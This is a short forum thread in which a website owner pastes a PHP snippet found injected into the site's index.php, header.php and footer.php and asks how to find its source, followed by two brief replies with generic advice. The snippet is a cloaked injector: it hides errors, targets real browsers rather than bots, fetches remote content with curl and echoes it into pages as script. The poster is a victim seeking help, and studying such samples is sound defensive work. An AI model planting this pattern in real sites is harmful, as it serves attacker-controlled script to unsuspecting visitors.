evi Posted June 13, 2014 Share Posted June 13, 2014 hi,I need help,my website (cyclesangot.fr) detected malware, and I found a strange script in each index.php, header.php, and footer.php,<? php# # b2f197error_reporting (0); ini_set ('display_errors', 0); $ wp_i8095 = @ $ _SERVER ['HTTP_USER_AGENT'];if ((preg_match ('/ Gecko | MSIE / i', $ wp_i8095) &&! preg_match ('/ bot / i', $ wp_i8095))) {$ ch = curl_init (); curl_setopt ($ ch, CURLOPT_URL, $ wp_i098095);curl_setopt ($ ch, CURLOPT_TIMEOUT, 6); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); $ wp_8095i = curl_exec ($ ch); curl_close ($ ch);}if (substr ($ wp_8095i, 1,3) === 'scr') {echo $ wp_8095i; }# / b2f197 #?>how to find files that generate the script in my website?thanks Link to comment Share on other sites More sharing options...
aamir_mit Posted June 13, 2014 Share Posted June 13, 2014 this might be due to server security, you need to remove your all code form there and install a new copy . and update your ant-virus. Link to comment Share on other sites More sharing options...
vekia Posted June 13, 2014 Share Posted June 13, 2014 hello you use for example wordpress on the same hosting account? Link to comment Share on other sites More sharing options...
Recommended Posts